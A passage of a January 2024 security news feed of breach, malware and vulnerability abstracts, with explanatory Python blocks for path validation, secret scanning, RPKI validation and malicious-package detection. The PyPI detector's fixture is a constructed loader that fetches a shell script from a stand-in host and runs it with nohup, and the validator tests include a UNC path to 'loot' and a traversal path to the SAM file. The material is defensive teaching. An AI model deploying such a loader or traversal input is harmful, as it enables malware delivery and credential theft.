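    # case-insensitive, so compare lower-cased).
    if full.lower() != root_n.lower() and not full.lower().startswith(root_n.lower() + "\\"):
        raise ValueError("path escapes backup root: " + full)
    return full


def is_safe_backup_path(candidate, root=DEFAULT_BACKUP_ROOT):
    try:
        resolve_backup_path(candidate, root)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for p in [r"nightly\db.bak", r"\\203.0.113.7\loot\db.bak",
              "//203.0.113.7/loot/db.bak", r"..\..\..\Windows\System32\config\SAM",
              r"C:\Windows\Temp\db.bak", r"\\?\C:\Windows\Temp\db.bak"]:
        print(f"{p!r:45} -> {is_safe_backup_path(p)}")
```

The host-level control the abstract quotes, "Restrict NTLM: Outgoing NTLM traffic to remote servers", is the compensating mitigation when the application cannot be patched; the validator above is what the application itself should have done with the path.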

January 9, 2024 – Breach

Saudi Ministry of Industry and Mineral Resources Exposed Sensitive Data for 15 Months Full Text

Abstract The Saudi Ministry of Industry and Mineral Resources (MIM) had a sensitive environment file exposed for 15 months, potentially allowing attackers to gain unauthorized access and launch ransomware attacks.

Cyware

January 09, 2024 – Phishing

Beware! YouTube Videos Promoting Cracked Software Distribute Lumma Stealer Full Text

Abstract Threat actors are resorting to YouTube videos featuring content related to cracked software in order to entice users into downloading information-stealing malware called Lumma. "These YouTube videos typically feature content related to cracked applications, presenting users with similar installation guides and incorporating malicious URLs often shortened using services like TinyURL and Cuttly," Fortinet FortiGuard Labs researcher Cara Lin said in a Monday analysis. This is not the first time pirated software videos on YouTube have emerged as an effective bait for stealer malware. Previously, similar attack chains were observed delivering stealers, clippers, and crypto miner malware. In doing so, threat actors can leverage the compromised machines not only for information and cryptocurrency theft but also to abuse their resources for illicit mining. In the latest attack sequence documented by Fortinet, users searching for cracked versions of legitimate video editing tools like

The Hacker News

January 9, 2024 – Policy and Law

New York Clinic Must Pay $450K Fine, Spend $1.2M on Security Full Text

Abstract The Refuah Health Center in New York has been fined up to $450,000 and required to invest over $1 million in improving its data security following a ransomware attack in 2021.

Cyware

January 9, 2024 – Vulnerabilities

Update: Apache OFBiz Zero-Day Sees Thousands of Daily Exploit Attempts Full Text

Abstract The authentication bypass flaw in OFBiz allows attackers to remotely execute arbitrary code and access sensitive information. Upgrading to OFBiz version 18.12.11 is crucial to patch both this zero-day vulnerability and another equally serious hole.

Cyware

January 9, 2024 – Attack

Rhysida Ransomware Gang Takes Credit for Christmas Attack on Global Lutheran Organization Full Text

Abstract The attack was carried out by the Rhysida ransomware gang, who also claimed responsibility for attacking the Lutheran World Federation, a member of the WCC. The WCC's systems went down on December 26, 2023.

Cyware

January 8, 2024 – Outage

Cyberattack Hits Maldives Government Websites Full Text

Abstract Over the weekend, the Maldives government websites experienced a cyberattack, resulting in temporary unavailability of the President's office, Foreign Ministry, and Tourism Ministry websites.

Cyware

January 08, 2024 – Criminals

Syrian Hackers Distributing Stealthy C#-Based Silver RAT to Cybercriminals Full Text

Abstract Threat actors operating under the name Anonymous Arabic have released a remote access trojan (RAT) called Silver RAT that's equipped to bypass security software and stealthily launch hidden applications. "The developers operate on multiple hacker forums and social media platforms, showcasing an active and sophisticated presence," cybersecurity firm Cyfirma said in a report published last week. The actors, assessed to be of Syrian origin and linked to the development of another RAT known as S500 RAT, also run a Telegram channel offering various services such as the distribution of cracked RATs, leaked databases, carding activities, and the sale of Facebook and X (formerly Twitter) bots. The social media bots are then utilized by other cyber criminals to promote various illicit services by automatically engaging with and commenting on user content. In-the-wild detections of Silver RAT v1.0 were first observed in November 2023, although the threat actor's plans to release the tr

The Hacker News

January 8, 2024 – Denial Of Service

NoName Group Claims DDoS Attacks on Ukrainian Government Sites Full Text

Abstract The NoName group has reportedly targeted several Ukrainian government websites, including Accordbank, Zaporizhzhya Titanium-Magnesium Plant, and the State Tax Service. The group posted a list of their latest DDoS attack victims on the dark web.

Cyware

January 08, 2024 – General

Unifying Security Tech Beyond the Stack: Integrating SecOps with Managed Risk and Strategy Full Text

Abstract Cybersecurity is an infinite journey in a digital landscape that never ceases to change. According to the Ponemon Institute, "only 59% of organizations say their cybersecurity strategy has changed over the past two years." This stagnation in strategy adaptation can be traced back to several key issues. Talent Retention Challenges: The cybersecurity field is rapidly advancing, requiring a skilled and knowledgeable workforce. However, organizations face a critical shortage of such talent, making it difficult to keep strategies agile and relevant. Leadership Focus: Often, the attention of leadership teams is divided across various priorities, and cybersecurity may not be at the forefront. This can result in strategies becoming outdated and less effective. Board Engagement: Adequate board support is essential for strategy evolution. A lack of comprehensive understanding of cybersecurity issues at the board level can lead to insufficient resources and support for strategic updates.

The Hacker News

January 8, 2024 – Botnet

Bots, Fraud Farms, and Cryptojacking Surge, Urgently Requiring Attention Full Text

Abstract Cybercriminals are increasingly relying on ready-made bots and human fraud farms, which account for the majority of malicious website and app traffic, highlighting the need for robust defenses.

Cyware

January 08, 2024 – Education

Webinar – Leverage Zero Trust Security to Minimize Your Attack Surface Full Text

Abstract Digital expansion inevitably increases the external attack surface, making you susceptible to cyberthreats. Threat actors increasingly exploit the vulnerabilities stemming from software and infrastructure exposed to the internet; this ironically includes security tools, particularly firewalls and VPNs, which give attackers direct network access to execute their attacks. In fact, Gartner identified attack surface expansion as a major trend to watch. So, it is not surprising that External Attack Surface Management (EASM) is a growing priority for organizations. But traditional castle-and-moat-based security architectures are ineffective at protecting enterprises against today's sophisticated attacks, which increasingly leverage AI and as-a-service models to maximize speed and damage. Zero trust security is the best way to minimize the attack surface, prevent compromise, eliminate lateral movement, and stop data loss. Register here and join Apoorva Ravikrishnan, Senior Manager of P

The Hacker News

January 8, 2024 – Breach

Canada: Personal and Pregnancy Details of Midwives of Windsor Clients was Breached Full Text

Abstract The compromised data includes names, addresses, contact information, medical details, and health insurance information. The exact number of affected clients is unclear, and it is unknown if the information has been misused.

Cyware

January 08, 2024 – Government

NIST Warns of Security and Privacy Risks from Rapid AI System Deployment Full Text

Abstract The U.S. National Institute of Standards and Technology (NIST) is calling attention to the privacy and security challenges that arise as a result of increased deployment of artificial intelligence (AI) systems in recent years. "These security and privacy challenges include the potential for adversarial manipulation of training data, adversarial exploitation of model vulnerabilities to adversely affect the performance of the AI system, and even malicious manipulations, modifications or mere interaction with models to exfiltrate sensitive information about people represented in the data, about the model itself, or proprietary enterprise data," NIST said. As AI systems become integrated into online services at a rapid pace, in part driven by the emergence of generative AI systems like OpenAI ChatGPT and Google Bard, models powering these technologies face a number of threats at various stages of the machine learning operations. These include corrupted training data, security flaw

The Hacker News

January 8, 2024 – Attack

Beirut International Airport Hit by Cyberattack Affecting Flight Information Display System Full Text

Abstract The Beirut International Airport in Lebanon was targeted by a cyberattack, with hackers breaching the Flight Information Display System (FIDS) and disrupting the baggage inspection system.

Cyware

January 08, 2024 – Policy and Law

DoJ Charges 19 Worldwide in $68 Million xDedic Dark Web Marketplace Fraud Full Text

Abstract The U.S. Department of Justice (DoJ) said it charged 19 individuals worldwide in connection with the now-defunct xDedic Marketplace, which is estimated to have facilitated more than $68 million in fraud. In wrapping up its investigation into the dark web portal, the agency said the transnational operation was the result of close cooperation with law enforcement authorities from Belgium, Germany, the Netherlands, Ukraine, and Europol. Of the 19 defendants, three have been sentenced to 6.5 years in prison, eight have received jail terms ranging from one year to five years, and one individual has been ordered to serve five years' probation. Among them is Glib Oleksandr Ivanov-Tolpintsev, a Ukrainian national who was sentenced to four years in prison in May 2022 for selling compromised credentials on xDedic and making $82,648 in illegal profits. Dariy Pankov, described by the DoJ as one of the highest sellers by volume, offered credentials of no less than 35,000 ha

The Hacker News

January 8, 2024 – Outage

Update: Traces of LockBit Foul Play Emerge in Capital Health Cyberattack Full Text

Abstract Capital Health is now fully operational and working with a forensic investigation firm to assess the risk to patient and employee data. While Capital Health has not disclosed the hacker group involved, it has been alleged that LockBit ransomware was used.

Cyware

January 08, 2024 – Cryptocurrency

North Korea’s Cyber Heist: DPRK Hackers Stole $600 Million in Cryptocurrency in 2023 Full Text

Abstract Threat actors affiliated with the Democratic People's Republic of Korea (also known as North Korea) have plundered at least $600 million in cryptocurrency in 2023. The DPRK "was responsible for almost a third of all funds stolen in crypto attacks last year, despite a 30% reduction from the USD 850 million haul in 2022," blockchain analytics firm TRM Labs said last week. "Hacks perpetrated by the DPRK were on average ten times as damaging as those not linked to North Korea." There are indications that additional breaches targeting the crypto sector towards the end of 2023 could push this figure higher to around $700 million. The targeting of cryptocurrency companies is not new for North Korean state-sponsored actors, who have stolen about $3 billion since 2017. These financially motivated attacks are seen as a crucial revenue-generation mechanism for the sanctions-hit nation, funding its weapons of mass destruction (WMD) and ballistic missile program

The Hacker News

January 6, 2024 – Hacker

Syrian Threat Group Peddles Destructive SilverRAT Full Text

Abstract A group known as Anonymous Arabic, with links to Turkey and Syria, is behind a sophisticated remote access Trojan called SilverRAT. They plan to release an updated version that can control compromised Windows systems and Android devices.

Cyware

January 06, 2024 – Attack

Sea Turtle Cyber Espionage Campaign Targets Dutch IT and Telecom Companies Full Text

Abstract Telecommunication, media, internet service providers (ISPs), information technology (IT)-service providers, and Kurdish websites in the Netherlands have been targeted as part of a new cyber espionage campaign undertaken by a Türkiye-nexus threat actor known as Sea Turtle. "The infrastructure of the targets was susceptible to supply chain and island-hopping attacks, which the attack group used to collect politically motivated information such as personal information on minority groups and potential political dissents," Dutch security firm Hunt & Hackett said in a Friday analysis. "The stolen information is likely to be exploited for surveillance or intelligence gathering on specific groups and or individuals." Sea Turtle, also known by the names Cosmic Wolf, Marbled Dust (formerly Silicon), Teal Kurma, and UNC1326, was first documented by Cisco Talos in April 2019, detailing state-sponsored attacks targeting public and private entities in the Middle E

The Hacker News

January 6, 2024 – Criminals

Swatting: The New Normal in Ransomware Extortion Tactics Full Text

Abstract Extortionists are resorting to swatting as a new tactic to pressure hospitals into paying ransom demands. Swatting involves making false reports to the police, resulting in heavily armed officers showing up at victims' homes.

Cyware

January 06, 2024 – Attack

Pro-Iranian Hacker Group Targeting Albania with No-Justice Wiper Malware Full Text

Abstract The recent wave of cyber attacks targeting Albanian organizations involved the use of a wiper called No-Justice. The findings come from cybersecurity company ClearSky, which said the Windows-based malware "crashes the operating system in a way that it cannot be rebooted." The intrusions have been attributed to an Iranian "psychological operation group" known as Homeland Justice, which has been active since July 2022, specifically orchestrating destructive attacks against Albania. On December 24, 2023, the adversary resurfaced after a hiatus, stating it's "back to destroy supporters of terrorists," describing its latest campaign as #DestroyDurresMilitaryCamp. The Albanian city of Durrës currently hosts the dissident group People's Mojahedin Organization of Iran (MEK). Targets of the attack included ONE Albania, Eagle Mobile Albania, Air Albania, and the Albanian parliament. Two of the primary tools deployed during the campaign include an executa

The Hacker News

January 6, 2024 – Outage

West Virginia City Latest Municipality Hit With Cyberattack Full Text

Abstract The city of Beckley, West Virginia, is currently grappling with a cyberattack that has disrupted its computer network and prompted investigations into the incident's source and impact.

Cyware

January 6, 2024 – APT

Iranian APT Used No-Justice Wiper in Recent Albanian Attacks Full Text

Abstract The cybersecurity firm ClearSky identified the tools used, including the No-Justice wiper and a PowerShell code. The malware had a valid digital signature, making it appear legitimate.

Cyware

January 05, 2024 – Malware

SpectralBlur: New macOS Backdoor Threat from North Korean Hackers Full Text

Abstract Cybersecurity researchers have discovered a new Apple macOS backdoor called SpectralBlur that overlaps with a known malware family that has been attributed to North Korean threat actors. "SpectralBlur is a moderately capable backdoor that can upload/download files, run a shell, update its configuration, delete files, hibernate, or sleep, based on commands issued from the [command-and-control server]," security researcher Greg Lesnewich said. The malware shares similarities with KANDYKORN (aka SockRacket), an advanced implant that functions as a remote access trojan capable of taking control of a compromised host. It's worth noting that the KANDYKORN activity also intersects with another campaign orchestrated by the Lazarus sub-group known as BlueNoroff (aka TA444) which culminates in the deployment of a backdoor referred to as RustBucket and a late-stage payload dubbed ObjCShellz. In recent months, the threat actor has been observed combining disparate pieces of t

The Hacker News

January 05, 2024 – Education

Exposed Secrets are Everywhere. Here’s How to Tackle Them Full Text

Abstract Picture this: you stumble upon a concealed secret within your company's source code. Instantly, a wave of panic hits as you grasp the possible consequences. This one hidden secret has the power to pave the way for unauthorized entry, data breaches, and a damaged reputation. Understanding the secret is just the beginning; swift and resolute action becomes imperative. However, lacking the necessary context, you're left pondering the optimal steps to take. What's the right path forward in this situation? Secrets management is an essential aspect of any organization's security strategy. In a world where breaches are increasingly common, managing sensitive information such as API keys, credentials, and tokens can make all the difference. Secret scanners play a role in identifying exposed secrets within source code, but they have one significant limitation: they don't provide context. And without context, it's impossible to devise an appropriate response plan. Con

The Hacker News
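The item above argues that a raw secret match is not actionable without context. The Python below is an added example, not the article's or any vendor's scanner; it pairs simple pattern matching with the three pieces of context a responder actually uses: whether the value looks like a placeholder, whether the file lives under a test or documentation path, and whether the value has the entropy of a real credential. The repository snapshot, the key-shaped strings and the triage thresholds are constructed for the example and are not real credentials.

```python
import math
import re
from dataclasses import dataclass

# Constructed repository snapshot (path -> content). The access key id and the
# token below are made-up strings in the right shape, not real credentials.
SAMPLE_REPO = {
    "config/prod.env": "AWS_ACCESS_KEY_ID=AKIAQ7T3X9ZK2MVB8NPL\nAWS_REGION=eu-west-1\n",
    "tests/fixtures/settings.py":
        'DB_PASSWORD = "changeme"\nGITHUB_TOKEN = "ghp_A1b2C3d4E5f6G7h8I9j0K1l2M3n4O5p6Q7r8"\n',
    "docs/quickstart.md": 'Set `API_KEY="your-api-key-here"` before running.\n',
}

PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    # keyword = "value" / keyword: value, for anything the provider patterns miss
    "generic_assignment": re.compile(
        r"(?i)(?:password|passwd|secret|api[_-]?key|token)\s*[=:]\s*[\"']?([^\"'\s]{6,})"),
}
PLACEHOLDER_HINTS = ("example", "changeme", "your-", "xxx", "dummy", "sample", "<", "placeholder")
NON_PROD_DIRS = ("test", "tests", "fixtures", "docs", "examples", "spec")


@dataclass
class Finding:
    path: str
    line: int
    kind: str
    value: str
    action: str = ""


def entropy(s):
    """Shannon entropy in bits per character; generated secrets usually score > 3."""
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def triage(f):
    """Attach the context a bare matcher lacks and turn it into a recommended action."""
    v = f.value.lower()
    if any(h in v for h in PLACEHOLDER_HINTS) or len(set(v)) <= 2:
        return "ignore: placeholder value"
    directories = f.path.lower().split("/")[:-1]
    if any(d in NON_PROD_DIRS for d in directories):
        return "review: non-production path, confirm it is not a copied real credential"
    if entropy(f.value) < 3.0:
        return "review: low-entropy value, possibly a default"
    return "rotate now: production path, high-entropy, provider-shaped credential"


def scan(repo):
    findings = []
    for path, content in repo.items():
        for lineno, line in enumerate(content.splitlines(), 1):
            hit = None
            for kind in ("aws_access_key_id", "github_pat"):   # provider-shaped first
                m = PATTERNS[kind].search(line)
                if m:
                    hit = Finding(path, lineno, kind, m.group(0))
                    break
            if hit is None:
                m = PATTERNS["generic_assignment"].search(line)
                if m:
                    hit = Finding(path, lineno, "generic_assignment", m.group(1))
            if hit:
                hit.action = triage(hit)
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_REPO):
        print(f"{f.path}:{f.line} [{f.kind}] {f.action}")
```

The ordering matters: a value that is obviously a placeholder is dismissed before the path rule, so a real key pasted into a test fixture still surfaces for review rather than being silently ignored, and only a production-path, high-entropy, provider-shaped hit gets the "rotate now" verdict.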

January 5, 2024 – Government

The FBI Is Adding More Cyber-Focused Agents to US Embassies Full Text

Abstract The expansion of the FBI's cyber program reflects a shift towards a proactive approach, focusing on disrupting cybercriminal operations rather than just investigating after the fact.

Cyware

January 05, 2024 – Outage

Orange Spain Faces BGP Traffic Hijack After RIPE Account Hacked by Malware Full Text

Abstract Mobile network operator Orange Spain suffered an internet outage for several hours on January 3 after a threat actor used administrator credentials captured by means of stealer malware to hijack the border gateway protocol (BGP) traffic. "The Orange account in the IP network coordination center (RIPE) has suffered improper access that has affected the browsing of some of our customers," the company said in a message posted on X (formerly Twitter). However, the company emphasized no personal data was compromised and that the incident only affected some browsing services. The threat actor, who goes by the name Ms_Snow_OwO on X, claimed to have gained access to Orange Spain's RIPE account. RIPE NCC is the regional Internet registry (RIR) that oversees the allocation and registration of IP addresses and autonomous system (AS) numbers in Europe, Central Asia, Russia, and West Asia. "Using the stolen account, the threat actor modified the AS number belonging to Ora

The Hacker News
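The abstract above breaks off before saying which registry records were changed. The Python below is an added example, not the page's content or anything from Orange or RIPE NCC; it implements RFC 6811 route origin validation over constructed route origin authorizations (ROAs) to show the mechanism by which an origin-AS edit in RIR-managed records turns an operator's own announcements into RPKI-invalid routes that validating networks drop. It assumes, and the page does not state, that the altered records were ROAs; the prefixes and AS numbers are from the documentation ranges.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class ROA:
    prefix: str      # covered prefix, e.g. "198.51.100.0/24"
    max_length: int  # longest prefix length this ROA authorises
    asn: int         # origin AS authorised to announce it


def _covers(roa, net):
    cov = ipaddress.ip_network(roa.prefix)
    return cov.version == net.version and net.subnet_of(cov)


def rov(announced_prefix, origin_asn, roas):
    """RFC 6811 origin validation: 'valid', 'invalid' or 'not-found'.
    A route is valid if any covering ROA names its origin AS and its prefix
    length does not exceed that ROA's maxLength; invalid if ROAs cover the
    prefix but none matches; not-found if nothing covers it."""
    net = ipaddress.ip_network(announced_prefix, strict=False)
    covering = [r for r in roas if _covers(r, net)]
    if not covering:
        return "not-found"
    for r in covering:
        if r.asn == origin_asn and net.prefixlen <= r.max_length:
            return "valid"
    return "invalid"


# Constructed scenario: operator AS64500 announces 198.51.100.0/24 under a ROA
# it created (documentation ASN and prefix ranges, not the incident's values).
LEGIT_ROAS = frozenset({ROA("198.51.100.0/24", 25, 64500)})


def tamper(roas, prefix, new_asn):
    """Model an attacker with portal access rewriting the origin AS in a ROA."""
    return frozenset(ROA(r.prefix, r.max_length, new_asn) if r.prefix == prefix else r
                     for r in roas)


def before_and_after():
    tampered = tamper(LEGIT_ROAS, "198.51.100.0/24", 64511)
    return {
        "legit_before": rov("198.51.100.0/24", 64500, LEGIT_ROAS),
        "legit_after": rov("198.51.100.0/24", 64500, tampered),
        "hijacker_after": rov("198.51.100.0/24", 64511, tampered),
    }


if __name__ == "__main__":
    for k, v in before_and_after().items():
        print(f"{k}: {v}")
```

The asymmetry is the point: the operator's unchanged announcement becomes "invalid" and is dropped by every network enforcing ROV, while an announcement from the newly named AS would validate. The defensive consequences follow directly: the RIR portal login is as sensitive as a router password (the abstract says it was taken by stealer malware), and ROA changes for your own prefixes deserve an alert.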

January 5, 2024 – Government

DOE Announces Up to $70 Million to Strengthen Energy Sector Against Physical and Cyber Hazards Full Text

Abstract The funding opportunity is open to public and private stakeholders, universities, and DOE's National Laboratories, and will focus on developing innovative solutions to strengthen the resilience of America's energy systems.

Cyware

January 05, 2024 – Vulnerabilities

Alert: Ivanti Releases Patch for Critical Vulnerability in Endpoint Manager Solution Full Text

Abstract Ivanti has released security updates to address a critical flaw impacting its Endpoint Manager (EPM) solution that, if successfully exploited, could result in remote code execution (RCE) on susceptible servers. Tracked as CVE-2023-39336, the vulnerability has been rated 9.6 out of 10 on the CVSS scoring system. The shortcoming impacts EPM 2021 and EPM 2022 prior to SU5. "If exploited, an attacker with access to the internal network can leverage an unspecified SQL injection to execute arbitrary SQL queries and retrieve output without the need for authentication," Ivanti said in an advisory. "This can then allow the attacker control over machines running the EPM agent. When the core server is configured to use SQL express, this might lead to RCE on the core server." The disclosure arrived weeks after the company resolved nearly two dozen security flaws in its Avalanche enterprise mobile device management (MDM) solution. Of the 21 issues, 13 are rated critical (CVSS scores: 9.8

The Hacker News

January 4, 2024 – Business

SentinelOne Acquires PingSafe to Expand Cloud Security Capabilities Full Text

Abstract By integrating PingSafe's capabilities into SentinelOne's Singularity Platform, companies will have access to a unified, best-of-breed security platform for their entire cloud footprint.

Cyware

January 04, 2024 – Education

Three Ways To Supercharge Your Software Supply Chain Security Full Text

Abstract Section four of the "Executive Order on Improving the Nation's Cybersecurity" introduced a lot of people in tech to the concept of a "Software Supply Chain" and securing it. If you make software and ever hope to sell it to one or more federal agencies, you have to pay attention to this. Even if you never plan to sell to a government, understanding your Software Supply Chain and learning how to secure it will pay dividends in a stronger security footing and the benefits it provides. This article will look at three ways to supercharge your Software Supply Chain Security. What is your Software Supply Chain? It's essentially everything that goes into building a piece of software: from the IDE in which the developer writes code, to the third-party dependencies, to the build systems and scripts, to the hardware and operating system on which it runs. Instabilities and vulnerabilities can be introduced, maliciously or not, from inception to deployment and even beyond. 1: Ke

The Hacker News

January 4, 2024 – Vulnerabilities

Threat Actor Demands $1M for Remote Command Injection Vulnerability in Cisco ASA Full Text

Abstract The sale of this vulnerability poses significant risks, including network disruption, data compromise, and financial and reputational damage for organizations reliant on Cisco ASA.

Cyware

January 04, 2024 – Malware

Beware: 3 Malicious PyPI Packages Found Targeting Linux with Crypto Miners Full Text

Abstract Three new malicious packages have been discovered in the Python Package Index (PyPI) open-source repository with capabilities to deploy a cryptocurrency miner on affected Linux devices. The three harmful packages, named modularseven, driftme, and catme, attracted a total of 431 downloads over the past month before they were taken down. "These packages, upon initial use, deploy a CoinMiner executable on Linux devices," Fortinet FortiGuard Labs researcher Gabby Xiong said, adding the campaign shares overlaps with a prior campaign that involved the use of a package called culturestreak to deploy a crypto miner. The malicious code resides in the __init__.py file, which decodes and retrieves the first stage from a remote server, a shell script ("unmi.sh") that fetches a configuration file for the mining activity as well as the CoinMiner file hosted on GitLab. The ELF binary file is then executed in the background using the nohup command, thus ensuring that the process contin

The Hacker News
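The PyPI item above gives the shape of the loader: module-level code in __init__.py that decodes a string, fetches a shell script from a remote server and runs it detached with nohup, all on first import. The Python below is an added example, not Fortinet's tooling or the packages' code; it is a small static checker that parses an __init__.py with the ast module and flags those import-time behaviours without executing anything. The sample __init__.py is constructed to mirror the described behaviour, uses the reserved example.invalid domain, and is only ever parsed.

```python
import ast
import base64

# Constructed stand-in for a malicious __init__.py: decode, fetch, drop a shell
# script, run it in the background. The URL points at the reserved
# example.invalid domain; this string is parsed, never executed.
SAMPLE_INIT = '''\
import base64
import os
import urllib.request

_u = base64.b64decode("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvdW5taS5zaA==").decode()
_s = urllib.request.urlopen(_u).read()
open("/tmp/unmi.sh", "wb").write(_s)
os.system("nohup bash /tmp/unmi.sh >/dev/null 2>&1 &")

def helper():
    return 7
'''

BENIGN_INIT = '''\
from .core import helper
__all__ = ["helper"]
'''

SUSPICIOUS = {
    "base64.b64decode": "obfuscated payload decoded",
    "urllib.request.urlopen": "network fetch",
    "requests.get": "network fetch",
    "os.system": "shell command",
    "subprocess.Popen": "shell command",
    "subprocess.run": "shell command",
    "subprocess.call": "shell command",
    "exec": "dynamic code execution",
    "eval": "dynamic code execution",
}


def _dotted_name(node):
    """Rebuild 'a.b.c' from a Name/Attribute chain; None for anything else."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted_name(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def _const_str(node):
    return node.value if isinstance(node, ast.Constant) and isinstance(node.value, str) else None


def scan_init(source):
    """Flag suspicious calls that run at import time. Only module-level statements
    are inspected: function and class bodies do not execute on `import pkg`.
    Aliased imports (`from os import system`) are not resolved by this checker."""
    findings = []
    for stmt in ast.parse(source).body:
        if isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
            continue
        for node in ast.walk(stmt):
            if not isinstance(node, ast.Call):
                continue
            name = _dotted_name(node.func)
            if name not in SUSPICIOUS:
                continue
            f = {"line": node.lineno, "call": name, "why": SUSPICIOUS[name]}
            arg = _const_str(node.args[0]) if node.args else None
            if name == "base64.b64decode" and arg:
                try:  # show the analyst what the literal hides
                    f["decoded"] = base64.b64decode(arg).decode("utf-8", "replace")
                except ValueError:
                    pass
            if SUSPICIOUS[name] == "shell command" and arg and \
                    ("nohup" in arg or arg.rstrip().endswith("&")):
                f["why"] += ", detached so it outlives the installing shell"
            findings.append(f)
    return findings


def verdict(findings):
    kinds = {f["why"].split(",")[0] for f in findings}
    # Fetch plus execute at import time is the loader pattern; one alone is a hint.
    if "network fetch" in kinds and ("shell command" in kinds or "dynamic code execution" in kinds):
        return "block"
    return "review" if findings else "clean"


if __name__ == "__main__":
    for f in scan_init(SAMPLE_INIT):
        print(f)
    print(verdict(scan_init(SAMPLE_INIT)), verdict(scan_init(BENIGN_INIT)))
```

Restricting the walk to module-level statements is deliberate: that is the code that runs on the "initial use" the researcher describes, and it keeps ordinary library functions that legitimately shell out from tripping the check.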

January 4, 2024 – Breach

Update: Estes Refuses to Pay Off Ransomware Crew, Says Data Stolen Full Text

Abstract The company chose not to pay the ransom demanded by the hackers, aligning with the FBI's recommendation, but the specific details of the attack and the stolen data remain undisclosed.

Cyware

January 04, 2024 – Phishing

UAC-0050 Group Using New Phishing Tactics to Distribute Remcos RAT Full Text

Abstract The threat actor known as UAC-0050 is leveraging phishing attacks to distribute Remcos RAT using new strategies to evade detection from security software. "The group's weapon of choice is Remcos RAT, a notorious malware for remote surveillance and control, which has been at the forefront of its espionage arsenal," Uptycs security researchers Karthickkumar Kathiresan and Shilpesh Trivedi said in a Wednesday report. "However, in their latest operational twist, the UAC-0050 group has integrated a pipe method for interprocess communication, showcasing their advanced adaptability." UAC-0050, active since 2020, has a history of targeting Ukrainian and Polish entities via social engineering campaigns that impersonate legitimate organizations to trick recipients into opening malicious attachments. In February 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) attributed the adversary to a phishing campaign designed to deliver Remcos RAT. Over t

The Hacker News

January 4, 2024 – Breach

Cloud-Native Cybersecurity Startup Aqua Security Raises $60M and Remains a Unicorn Full Text

Abstract The Series E funding round was led by Evolution Equity Partners, with participation from existing investors Lightspeed Venture Partners, Insight Partners, and StepStone Group.

Cyware

January 04, 2024 – Outage

Mandiant’s Twitter Account Restored After Six-Hour Crypto Scam Hack Full Text

Abstract American cybersecurity firm and Google Cloud subsidiary Mandiant had its X (formerly Twitter) account compromised for more than six hours by an unknown attacker to propagate a cryptocurrency scam. As of writing, the account has been restored on the social media platform. It's currently not clear how the account was breached. But the hacked Mandiant account was initially renamed to "@phantomsolw" to impersonate the Phantom crypto wallet service, according to MalwareHunterTeam and vx-underground. Specifically, the scam posts from the account advertised an airdrop scam that urged users to click on a bogus link and earn free tokens, with follow-up messages asking Mandiant to "change password please" and "check bookmarks when you get account back." Mandiant, a leading threat intelligence firm, was acquired by Google in March 2022 for $5.4 billion. It is now part of Google Cloud. "The Mandiant Twitter account takeover could have happened

The Hacker News

January 4, 2024 – Government

FTC Soliciting Contest Submissions to Help Tackle Voice Cloning Technology Full Text

Abstract The FTC is seeking multidisciplinary approaches to prevent unauthorized use of voice cloning, improve real-time detection, and provide consumers with tools to identify cloned voices in audio clips.

Cyware

January 3, 2024 – Outage

‘Large-Scale’ Cyberattack Hits French Township, All Local Services Down Full Text

Abstract The mayor of Pays Fouesnantais, a township in France, announced that the municipality has been hit by a large-scale cyberattack, causing all community services to be taken down.

Cyware

January 03, 2024 – Malware

Malware Using Google MultiLogin Exploit to Maintain Access Despite Password Reset Full Text

Abstract Information-stealing malware is actively taking advantage of an undocumented Google OAuth endpoint named MultiLogin to hijack user sessions and allow continuous access to Google services even after a password reset. According to CloudSEK, the critical exploit facilitates session persistence and cookie generation, enabling threat actors to maintain access to a valid session in an unauthorized manner. The technique was first revealed by a threat actor named PRISMA on October 20, 2023, on their Telegram channel. It has since been incorporated into various malware-as-a-service (MaaS) stealer families, such as Lumma, Rhadamanthys, Stealc, Meduza, RisePro, and WhiteSnake. The MultiLogin authentication endpoint is primarily designed for synchronizing Google accounts across services when users sign in to their accounts in the Chrome web browser (i.e., profiles). A reverse engineering of the Lumma Stealer code has revealed that the technique targets the "Chrome's token_

The Hacker News

January 3, 2024 – Business

SonicWall Acquires Banyan to Boost Zero-Trust, SSE Offerings Full Text

Abstract With its second acquisition in two months, SonicWall aims to help enterprises with growing remote workforces through zero-trust network and security service edge offerings.

Cyware

January 03, 2024 – Solution

5 Ways to Reduce SaaS Security Risks Full Text

Abstract As technology adoption has shifted to be employee-led, just in time, and from any location or device, IT and security teams have found themselves contending with an ever-sprawling SaaS attack surface, much of which is often unknown or unmanaged. This greatly increases the risk of identity-based threats, and according to a recent report from CrowdStrike, 80% of breaches today use compromised identities, including cloud and SaaS credentials. Given this reality, IT security leaders need practical and effective SaaS security solutions designed to discover and manage their expanding SaaS footprint. Here are 5 key ways Nudge Security can help. Close the visibility gap Knowing the full scope of SaaS apps in use is the foundation of a modern IT governance program. Without an understanding of your entire SaaS footprint, you cannot say with confidence where your corporate IP is stored (Did someone sync their desktop to Dropbox?), you cannot make assumptions about your customer data (Did s

The Hacker News

January 3, 2024 – Breach

Threat Actor Leaks 3.6 Million Records Allegedly Stolen From Cross Switch Full Text

Abstract The data breach, carried out by a threat actor named IntelBroker, has allegedly exposed sensitive details such as full names, emails, phone numbers, banking information, and more.

Cyware

January 03, 2024 – Vulnerabilities

SMTP Smuggling: New Flaw Lets Attackers Bypass Security and Spoof Emails Full Text

